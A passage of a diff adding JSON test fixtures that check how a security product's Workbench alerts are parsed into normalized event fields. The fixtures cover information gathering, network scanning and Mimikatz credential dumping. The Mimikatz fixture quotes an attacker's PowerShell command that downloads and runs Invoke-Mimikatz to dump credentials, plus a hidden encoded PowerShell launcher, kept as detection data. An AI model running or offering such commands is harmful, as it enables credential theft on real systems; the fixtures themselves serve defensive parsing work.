\"2024-11-26T16:44:46.602Z\", \"mitreTechniqueIds\": [\"T1016\"], \"matchedEvents\": [{\"uuid\": \"7a733f00-faa0-4ac2-b97c-34d8f3ffd230\", \"matchedDateTime\": \"2024-11-26T16:44:46.602Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\whoami.exe\\\"\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell_ISE.exe\\\" \", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\Explorer.EXE\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\ipconfig.exe\\\" /all \", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell_ISE.exe\\\" \", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\Explorer.EXE\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"file_sha1\", \"field\": \"processFileHashSha1\", \"value\": \"4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"file_sha1\", \"field\": \"processFileHashSha1\", \"value\": \"4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 9, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 10, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 11, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 12, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 13, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell_ise.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 14, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 15, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell_ise.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 16, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 17, \"type\": \"process_id\", \"field\": \"processPid\", \"value\": \"5040\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 18, \"type\": \"process_id\", \"field\": \"parentPid\", \"value\": \"9920\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 19, \"type\": \"process_id\", \"field\": \"processPid\", \"value\": \"5040\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 20, \"type\": \"process_id\", \"field\": \"parentPid\", \"value\": \"9920\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}]}", + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "reason": "Potential Information Gathering", + "type": [ + "info" + ], + "url": "https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000" + }, + "@timestamp": "2024-11-26T16:48:06Z", + "host": { + "id": "7b00c266-f17f-439f-bb94-3945d463a78b", + "ip": [ + "10.0.0.6" + ], + "name": "windows10" + }, + "observer": { + "product": "Vision One", + "vendor": "TrendMicro" + }, + "process": { + "command_line": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell_ISE.exe\" ", + "executable": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe", + "hash": { + "sha1": "4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55", + "sha256": "A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8" + }, + "parent": { + "command_line": "C:\\Windows\\Explorer.EXE", + "executable": "C:\\Windows\\explorer.exe", + "hash": { + "sha256": "4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753" + }, + "pid": 9920 + }, + "pid": 5040 + }, + "related": { + "hash": [ + "4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753", + "4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55", + "A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8" + ], + "ip": [ + "10.0.0.6" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "Potential Information Gathering" + }, + "trendmicro": { + "vision_one": { + "alert_id": "WB-11111-22222222-00000", + "investigation_status": "New", + "severity": "low", + "status": "Open" + } + }, + "user": { + "domain": "windows10", + "id": "windows10\\jdoe", + "name": "jdoe" + } + } +} \ No newline at end of file diff --git a/Trend Micro/trend-micro-vision-one-workbench/tests/test_internal_network_scanner.json b/Trend Micro/trend-micro-vision-one-workbench/tests/test_internal_network_scanner.json new file mode 100644 index 000000000..d15f28c6f --- /dev/null +++ b/Trend Micro/trend-micro-vision-one-workbench/tests/test_internal_network_scanner.json @@ -0,0 +1,74 @@ +{ + "input": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=7ddf32e17a6ac5ce04a8ecbf782ca509\", \"alertProvider\": \"SAE\", \"modelId\": \"fc93e58b-142a-46bd-89b3-0670004728da\", \"model\": \"Internal Network Scanner\", \"modelType\": \"preset\", \"score\": 22, \"severity\": \"low\", \"createdDateTime\": \"2024-07-23T14:46:11Z\", \"updatedDateTime\": \"2024-07-23T14:46:11Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"john\\\\doe\", \"entityId\": \"john\\\\doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"name\": \"doe10\", \"ips\": [\"1.2.3.4\"]}, \"entityId\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"relatedEntities\": [\"john\\\\doe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8], \"provenance\": [\"Sweeping\", \"Alert\"], \"managementScopeGroupId\": \"a008286d-c35c-4b85-85bb-6c744b27c2e7\"}]}, \"description\": \"Detects usage of network scanner to gather information\", \"matchedRules\": [{\"id\": \"1382c167-1c06-4312-89bd-2db0573a0a3e\", \"name\": \"Internal Network Scanning\", \"matchedFilters\": [{\"id\": \"95fa94aa-126d-40a1-92dd-e4427da20897\", \"name\": \"Internal Network Scanning via Famatech Scanner Tools\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"mitreTechniqueIds\": [\"T1046\"], \"matchedEvents\": [{\"uuid\": \"47028c1b-ba5b-45ec-98b0-2f62b8ee1665\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"C:\\\\WINDOWS\\\\Explorer.EXE\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\\\" \", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"file_sha256\", \"field\": \"objectFileHashSha256\", \"value\": \"E665BB196B40DBB0FA91DBB908DB7DA5065BA28DF9F445AD97C17DF180FF43A1\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"B9AB76C0E991FED29CF07956B7B5E758DB91BEF52E4C0FA810FEF88000506631\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"objectFilePath\", \"value\": \"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"user_account\", \"field\": \"logonUser\", \"value\": \"doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Related Asset Enrichment\", \"Alert\"]}, {\"id\": 8, \"type\": \"user_account\", \"field\": \"\", \"value\": \"Syst\\u00e8me\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}]}" + }, + "expected": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=7ddf32e17a6ac5ce04a8ecbf782ca509\", \"alertProvider\": \"SAE\", \"modelId\": \"fc93e58b-142a-46bd-89b3-0670004728da\", \"model\": \"Internal Network Scanner\", \"modelType\": \"preset\", \"score\": 22, \"severity\": \"low\", \"createdDateTime\": \"2024-07-23T14:46:11Z\", \"updatedDateTime\": \"2024-07-23T14:46:11Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"john\\\\doe\", \"entityId\": \"john\\\\doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"name\": \"doe10\", \"ips\": [\"1.2.3.4\"]}, \"entityId\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"relatedEntities\": [\"john\\\\doe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8], \"provenance\": [\"Sweeping\", \"Alert\"], \"managementScopeGroupId\": \"a008286d-c35c-4b85-85bb-6c744b27c2e7\"}]}, \"description\": \"Detects usage of network scanner to gather information\", \"matchedRules\": [{\"id\": \"1382c167-1c06-4312-89bd-2db0573a0a3e\", \"name\": \"Internal Network Scanning\", \"matchedFilters\": [{\"id\": \"95fa94aa-126d-40a1-92dd-e4427da20897\", \"name\": \"Internal Network Scanning via Famatech Scanner Tools\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"mitreTechniqueIds\": [\"T1046\"], \"matchedEvents\": [{\"uuid\": \"47028c1b-ba5b-45ec-98b0-2f62b8ee1665\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"C:\\\\WINDOWS\\\\Explorer.EXE\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\\\" \", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"file_sha256\", \"field\": \"objectFileHashSha256\", \"value\": \"E665BB196B40DBB0FA91DBB908DB7DA5065BA28DF9F445AD97C17DF180FF43A1\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"B9AB76C0E991FED29CF07956B7B5E758DB91BEF52E4C0FA810FEF88000506631\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"objectFilePath\", \"value\": \"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"user_account\", \"field\": \"logonUser\", \"value\": \"doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Related Asset Enrichment\", \"Alert\"]}, {\"id\": 8, \"type\": \"user_account\", \"field\": \"\", \"value\": \"Syst\\u00e8me\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}]}", + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "reason": "Internal Network Scanner", + "type": [ + "info" + ], + "url": "https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=7ddf32e17a6ac5ce04a8ecbf782ca509" + }, + "@timestamp": "2024-07-23T14:46:11Z", + "file": { + "directory": "C:\\Users\\doe.john\\Downloads", + "hash": { + "sha256": "E665BB196B40DBB0FA91DBB908DB7DA5065BA28DF9F445AD97C17DF180FF43A1" + }, + "name": "Advanced_IP_Scanner_2.5.4594.1.exe", + "path": "C:\\Users\\doe.john\\Downloads\\Advanced_IP_Scanner_2.5.4594.1.exe" + }, + "host": { + "id": "3F783642-C0D0-4AFD-84B6-F6751E5BF80F", + "ip": [ + "1.2.3.4" + ], + "name": "doe10" + }, + "observer": { + "product": "Vision One", + "vendor": "TrendMicro" + }, + "process": { + "command_line": "C:\\WINDOWS\\Explorer.EXE", + "executable": "C:\\Windows\\explorer.exe", + "hash": { + "sha256": "B9AB76C0E991FED29CF07956B7B5E758DB91BEF52E4C0FA810FEF88000506631" + } + }, + "related": { + "hash": [ + "B9AB76C0E991FED29CF07956B7B5E758DB91BEF52E4C0FA810FEF88000506631", + "E665BB196B40DBB0FA91DBB908DB7DA5065BA28DF9F445AD97C17DF180FF43A1" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "doe" + ] + }, + "rule": { + "name": "Internal Network Scanner" + }, + "trendmicro": { + "vision_one": { + "alert_id": "WB-11111-22222222-00000", + "investigation_status": "New", + "severity": "low", + "status": "Open" + } + }, + "user": { + "domain": "john", + "id": "john\\doe", + "name": "doe" + } + } +} \ No newline at end of file diff --git a/Trend Micro/trend-micro-vision-one-workbench/tests/test_process.json b/Trend Micro/trend-micro-vision-one-workbench/tests/test_process.json new file mode 100644 index 000000000..3c77d1afd --- /dev/null +++ b/Trend Micro/trend-micro-vision-one-workbench/tests/test_process.json @@ -0,0 +1,73 @@ +{ + "input": { + "message": "{\"schemaVersion\": \"1.12\", \"id\": \"WB-9002-20220906-00023\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://THE_WORKBENCH_URL\", \"alertProvider\": \"SAE\", \"modelId\": \"1ebd4f91-4b28-40b4-87f5-8defee4791d8\", \"model\": \"Credential Dumping via Mimikatz\", \"modelType\": \"preset\", \"score\": 64, \"severity\": \"high\", \"createdDateTime\": \"2022-09-06T02:49:30Z\", \"updatedDateTime\": \"2022-09-06T02:49:50Z\", \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"shockwave\\\\sam\", \"entityId\": \"shockwave\\\\sam\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"name\": \"nimda\", \"ips\": [\"10.10.58.51\"]}, \"entityId\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"managementScopeGroupId\": \"deadbeef-292e-42ae-86be-d2fef483a248\", \"managementScopeInstanceId\": \"1babc299-52de-44f4-a1d2-8a224f391eee\", \"managementScopePartitionKey\": \"4c1850c0-8a2a-4637-9f88-6afbab54dd79\", \"relatedEntities\": [\"shockwave\\\\sam\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7], \"provenance\": [\"Alert\"]}]}, \"description\": \"A user obtained account logon information that can be used to access remote systems via Mimikatz.\", \"matchedRules\": [{\"id\": \"1288958d-3062-4a75-91fc-51b2a49bc7d7\", \"name\": \"Potential Credential Dumping via Mimikatz\", \"matchedFilters\": [{\"id\": \"49d327c4-361f-43f0-b66c-cab433495e42\", \"name\": \"Possible Credential Dumping via Mimikatz\", \"matchedDateTime\": \"2022-09-05T03:53:57.199Z\", \"mitreTechniqueIds\": [\"V9.T1003.001\", \"V9.T1059.003\", \"V9.T1212\"], \"matchedEvents\": [{\"uuid\": \"e168a6e5-27b1-462b-ad3e-5146df4e6aa5\", \"matchedDateTime\": \"2022-09-05T03:53:57.199Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe \\\"iex (new-object net.webclient).downloadstring(\\\" \\\"https://raw.githubusercontent.com/mattifestation/powersploit/master/exfiltration/invoke-mimikatz.ps1); invoke-mimikatz -dumpcreds\\\"\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe -nop -noni -w hidden -enc ......aakaakaekavgaracqaswapackafabjaeuawaa=\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe -nop -noni -w hidden -c $x=$((gp hkcu:software\\\\microsoft\\\\windows update).update); powershell -nop -noni -w hidden -enc $x\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"file_sha1\", \"field\": \"objectFileHashSha1\", \"value\": \"1B3B40FBC889FD4C645CC12C85D0805AC36BA254\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"fullpath\", \"field\": \"objectFilePath\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"Nimda\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}]}" + }, + "expected": { + "message": "{\"schemaVersion\": \"1.12\", \"id\": \"WB-9002-20220906-00023\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://THE_WORKBENCH_URL\", \"alertProvider\": \"SAE\", \"modelId\": \"1ebd4f91-4b28-40b4-87f5-8defee4791d8\", \"model\": \"Credential Dumping via Mimikatz\", \"modelType\": \"preset\", \"score\": 64, \"severity\": \"high\", \"createdDateTime\": \"2022-09-06T02:49:30Z\", \"updatedDateTime\": \"2022-09-06T02:49:50Z\", \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"shockwave\\\\sam\", \"entityId\": \"shockwave\\\\sam\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"name\": \"nimda\", \"ips\": [\"10.10.58.51\"]}, \"entityId\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"managementScopeGroupId\": \"deadbeef-292e-42ae-86be-d2fef483a248\", \"managementScopeInstanceId\": \"1babc299-52de-44f4-a1d2-8a224f391eee\", \"managementScopePartitionKey\": \"4c1850c0-8a2a-4637-9f88-6afbab54dd79\", \"relatedEntities\": [\"shockwave\\\\sam\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7], \"provenance\": [\"Alert\"]}]}, \"description\": \"A user obtained account logon information that can be used to access remote systems via Mimikatz.\", \"matchedRules\": [{\"id\": \"1288958d-3062-4a75-91fc-51b2a49bc7d7\", \"name\": \"Potential Credential Dumping via Mimikatz\", \"matchedFilters\": [{\"id\": \"49d327c4-361f-43f0-b66c-cab433495e42\", \"name\": \"Possible Credential Dumping via Mimikatz\", \"matchedDateTime\": \"2022-09-05T03:53:57.199Z\", \"mitreTechniqueIds\": [\"V9.T1003.001\", \"V9.T1059.003\", \"V9.T1212\"], \"matchedEvents\": [{\"uuid\": \"e168a6e5-27b1-462b-ad3e-5146df4e6aa5\", \"matchedDateTime\": \"2022-09-05T03:53:57.199Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe \\\"iex (new-object net.webclient).downloadstring(\\\" 